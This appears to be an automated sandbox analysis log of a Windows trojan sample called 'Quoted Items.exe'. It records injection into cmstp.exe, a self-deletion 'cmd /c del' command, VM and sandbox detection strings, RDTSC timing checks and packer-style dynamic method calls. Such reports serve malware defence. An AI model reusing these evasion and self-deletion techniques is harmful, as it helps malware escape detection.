Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119780 NtMapViewOfSection,LdrInitializeThunk,	16_2_05119780
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119FE0 NtCreateMutant,LdrInitializeThunk,	16_2_05119FE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119650 NtQueryValueKey,LdrInitializeThunk,	16_2_05119650
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119660 NtAllocateVirtualMemory,LdrInitializeThunk,	16_2_05119660
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051196D0 NtCreateKey,LdrInitializeThunk,	16_2_051196D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051196E0 NtFreeVirtualMemory,LdrInitializeThunk,	16_2_051196E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119910 NtAdjustPrivilegesToken,LdrInitializeThunk,	16_2_05119910
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051199A0 NtCreateSection,LdrInitializeThunk,	16_2_051199A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119840 NtDelayExecution,LdrInitializeThunk,	16_2_05119840
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119860 NtQuerySystemInformation,LdrInitializeThunk,	16_2_05119860
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119A50 NtCreateFile,LdrInitializeThunk,	16_2_05119A50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0511AD30 NtSetContextThread,	16_2_0511AD30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119520 NtWaitForSingleObject,	16_2_05119520
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119560 NtWriteFile,	16_2_05119560
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051195F0 NtQueryInformationFile,	16_2_051195F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0511A710 NtOpenProcessToken,	16_2_0511A710
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119730 NtQueryVirtualMemory,	16_2_05119730
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0511A770 NtOpenThread,	16_2_0511A770
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119770 NtSetInformationFile,	16_2_05119770
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119760 NtOpenProcess,	16_2_05119760
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051197A0 NtUnmapViewOfSection,	16_2_051197A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119610 NtEnumerateValueKey,	16_2_05119610
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119670 NtQueryInformationProcess,	16_2_05119670
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119950 NtQueueApcThread,	16_2_05119950
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051199D0 NtCreateProcessEx,	16_2_051199D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119820 NtEnumerateKey,	16_2_05119820
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0511B040 NtSuspendThread,	16_2_0511B040
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051198A0 NtWriteVirtualMemory,	16_2_051198A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051198F0 NtReadVirtualMemory,	16_2_051198F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119B00 NtSetValueKey,	16_2_05119B00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0511A3B0 NtGetContextThread,	16_2_0511A3B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119A10 NtQuerySection,	16_2_05119A10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119A00 NtProtectVirtualMemory,	16_2_05119A00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119A20 NtResumeThread,	16_2_05119A20
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119A80 NtOpenDirectoryObject,	16_2_05119A80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC85D0 NtCreateFile,	16_2_00DC85D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC8680 NtReadFile,	16_2_00DC8680
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC87B0 NtAllocateVirtualMemory,	16_2_00DC87B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC8700 NtClose,	16_2_00DC8700
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC86FA NtClose,	16_2_00DC86FA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC87AA NtAllocateVirtualMemory,	16_2_00DC87AA

Source: Quoted Items.exe, 00000000.00000002.291013641.0000000007840000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Quoted Items.exe
Source: Quoted Items.exe, 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Quoted Items.exe
Source: Quoted Items.exe, 00000000.00000002.285355220.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAuthorizationRuleCollect.exe6 vs Quoted Items.exe
Source: Quoted Items.exe, 00000004.00000000.276006405.000000000069C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAuthorizationRuleCollect.exe6 vs Quoted Items.exe
Source: Quoted Items.exe, 00000004.00000002.352397627.000000000140F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Quoted Items.exe
Source: Quoted Items.exe, 00000004.00000003.281729313.0000000000F3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Quoted Items.exe
Source: Quoted Items.exe, 00000004.00000003.286087431.00000000010EB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Quoted Items.exe
Source: Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Quoted Items.exe
Source: Quoted Items.exe	Binary or memory string: OriginalFilenameAuthorizationRuleCollect.exe6 vs Quoted Items.exe

Source: Quoted Items.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Quoted Items.exe	Virustotal: Detection: 44%
Source: Quoted Items.exe	ReversingLabs: Detection: 48%

Source: Quoted Items.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quoted Items.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quoted Items.exe "C:\Users\user\Desktop\Quoted Items.exe"
Source: C:\Users\user\Desktop\Quoted Items.exe	Process created: C:\Users\user\Desktop\Quoted Items.exe C:\Users\user\Desktop\Quoted Items.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quoted Items.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quoted Items.exe	Process created: C:\Users\user\Desktop\Quoted Items.exe C:\Users\user\Desktop\Quoted Items.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quoted Items.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\cmstp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Quoted Items.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quoted Items.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@6/3

Source: C:\Users\user\Desktop\Quoted Items.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01

Source: Quoted Items.exe, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Quoted Items.exe, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Quoted Items.exe.bf0000.0.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Quoted Items.exe.bf0000.0.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Quoted Items.exe.bf0000.0.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Quoted Items.exe.bf0000.0.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.Quoted Items.exe.600000.3.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.Quoted Items.exe.600000.3.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.Quoted Items.exe.600000.2.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.Quoted Items.exe.600000.2.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.Quoted Items.exe.600000.1.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.Quoted Items.exe.600000.1.unpack, oK/KZ.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\Quoted Items.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Quoted Items.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quoted Items.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Quoted Items.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: AuthorizationRuleCollect.pdb source: Quoted Items.exe
Source:	Binary string: wntdll.pdbUGP source: Quoted Items.exe, 00000004.00000003.279757387.0000000000E29000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351539993.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000003.285678625.0000000000FCC000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.351171334.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.352532340.0000000004F11000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Quoted Items.exe, 00000004.00000003.279757387.0000000000E29000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351539993.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000003.285678625.0000000000FCC000.00000004.00000800.00020000.00000000.sdmp, Quoted Items.exe, 00000004.00000002.351751722.000000000127F000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000010.00000003.351171334.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, cmstp.exe, 00000010.00000003.352532340.0000000004F11000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Quoted Items.exe, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.Quoted Items.exe.bf0000.0.unpack, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.Quoted Items.exe.bf0000.0.unpack, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.Quoted Items.exe.600000.3.unpack, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.Quoted Items.exe.600000.2.unpack, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.Quoted Items.exe.600000.1.unpack, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.Quoted Items.exe.600000.5.unpack, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.Quoted Items.exe.600000.0.unpack, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.Quoted Items.exe.600000.7.unpack, oK/KZ.cs	.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_02D693BD pushad ; retf	0_2_02D693BE
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_02D690D0 pushad ; retf	0_2_02D690D1
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_02D69BED pushad ; retf	0_2_02D69BEE
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_02D6987F pushad ; retf	0_2_02D69880
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_07837017 pushfd ; retf	0_2_0783701C
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041B87C push eax; ret	4_2_0041B882
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041B812 push eax; ret	4_2_0041B818
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041B81B push eax; ret	4_2_0041B882
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0040C8D2 push esp; iretd	4_2_0040C8DA
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041C905 push dword ptr [DE3B1691h]; ret	4_2_0041C926
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041612A push 78D33A13h; iretd	4_2_004161E2
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_004161B3 push 78D33A13h; iretd	4_2_004161E2
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0040C2F8 push ds; retf	4_2_0040C328
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0040D417 push 00000060h; iretd	4_2_0040D41D
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041CDA5 push 073A5053h; ret	4_2_0041CDC5
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00414E92 push esp; ret	4_2_00414EA1
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00414EA2 push ds; retf	4_2_00414EA3
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041B7C5 push eax; ret	4_2_0041B818
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0512D0D1 push ecx; ret	16_2_0512D0E4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DBC8D2 push esp; iretd	16_2_00DBC8DA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DCB87C push eax; ret	16_2_00DCB882
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DCB81B push eax; ret	16_2_00DCB882
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DCB812 push eax; ret	16_2_00DCB818
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC61B3 push 78D33A13h; iretd	16_2_00DC61E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DCC905 push dword ptr [DE3B1691h]; ret	16_2_00DCC926
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC612A push 78D33A13h; iretd	16_2_00DC61E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DBC2F8 push ds; retf	16_2_00DBC328
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DBD417 push 00000060h; iretd	16_2_00DBD41D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DCCDA5 push 073A5053h; ret	16_2_00DCCDC5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC4E92 push esp; ret	16_2_00DC4EA1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DC4EA2 push ds; retf	16_2_00DC4EA3

Source: initial sample

Static PE information: section name: .text entropy: 7.72747835774

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd delete

Source: C:\Windows\SysWOW64\cmstp.exe	Process created: /c del "C:\Users\user\Desktop\Quoted Items.exe"
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: /c del "C:\Users\user\Desktop\Quoted Items.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.Quoted Items.exe.2fc435c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.2fd9a34.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quoted Items.exe.2fcd7e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quoted Items.exe PID: 6360, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Quoted Items.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Quoted Items.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 0000000000DB8604 second address: 0000000000DB860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 0000000000DB898E second address: 0000000000DB8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Quoted Items.exe TID: 6364	Thread sleep time: -45733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe TID: 6388	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 1508	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Quoted Items.exe

Code function: 4_2_004088C0 rdtsc

4_2_004088C0

Source: C:\Users\user\Desktop\Quoted Items.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmstp.exe

API coverage: 7.1 %

Source: C:\Users\user\Desktop\Quoted Items.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Quoted Items.exe	Thread delayed: delay time: 45733			Jump to behavior
Source: C:\Users\user\Desktop\Quoted Items.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000005.00000000.313752460.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.374832571.0000000000680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000005.00000000.326795493.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Quoted Items.exe, 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.314862974.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 00000005.00000000.294924732.00000000062C4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
